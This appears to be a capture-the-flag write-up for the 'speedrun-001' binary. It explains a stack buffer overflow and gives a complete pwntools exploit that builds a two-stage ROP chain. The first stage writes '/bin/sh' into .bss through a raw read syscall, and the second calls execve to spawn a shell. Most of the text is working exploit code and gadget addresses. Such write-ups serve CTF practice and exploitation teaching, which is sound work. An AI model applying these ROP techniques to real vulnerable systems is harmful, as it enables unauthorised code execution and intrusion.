How to Solve
- Disassembling the binary in IDA shows that in function sub_400B60 the local variable buf is 0x400 bytes, but read() is called with a length of 0x7D0, so a stack buffer overflow (BOF) occurs.
- gdb speedrun-001, checksec: NX is enabled, so the stack is not executable. Instead, use read() to write "/bin/sh" into the .bss section and then call execve("/bin/sh") with it.
- file speedrun-001: the binary is statically linked, so use raw system calls via a syscall gadget. The syscall number for read() is 0 and for execve() is 59.
Design the Payload
read(0, address of bss, 8);
execve("/bin/sh", NULL, NULL);
Find the gadgets: ROPgadget --binary speedrun-001 | grep
code            | address
pop rdi ; ret   | 0x400686
pop rsi ; ret   | 0x4101f3
pop rdx ; ret   | 0x4498b5
pop rax ; ret   | 0x415664
syscall ; ret   | 0x474e65
Exploit Code
from pwn import *

p = process('./speedrun-001')

def dd(payload):
    # wait for the prompt, then deliver the overflowing input
    p.recvuntil(b'Any last words?')
    p.sendline(payload)

# gadget addresses (static, non-PIE binary)
rdi = 0x400686      # pop rdi ; ret
rsi = 0x4101f3      # pop rsi ; ret
rdx = 0x4498b5      # pop rdx ; ret
rax = 0x415664      # pop rax ; ret
syscall = 0x474e65  # syscall ; ret
main = 0x400BC1     # return here to trigger the overflow a second time
bss = 0x6bbb00      # writable .bss address that will hold "/bin/sh"

# stage 1: read(0, bss, 8) to store "/bin/sh\x00" in .bss, then return to main
payload = b'A' * 0x400           # buf
payload += p64(bss - 0x100)      # sfp (saved rbp, pointed into writable memory)
payload += p64(rdi) + p64(0)     # fd = stdin
payload += p64(rsi) + p64(bss)   # *buf = .bss
payload += p64(rdx) + p64(8)     # size = 8
payload += p64(rax) + p64(0)     # syscall number: read
payload += p64(syscall)
payload += p64(main)             # ret to main
dd(payload)
p.send(b"/bin/sh\x00")           # consumed by the read() above

# stage 2: execve("/bin/sh", NULL, NULL)
payload = b'A' * 0x400           # buf
payload += b'B' * 8              # sfp
payload += p64(rdi) + p64(bss)   # "/bin/sh\x00"
payload += p64(rsi) + p64(0)     # argv = NULL
payload += p64(rdx) + p64(0)     # envp = NULL
payload += p64(rax) + p64(59)    # syscall number: execve
payload += p64(syscall)
dd(payload)

p.interactive()
Get The Shell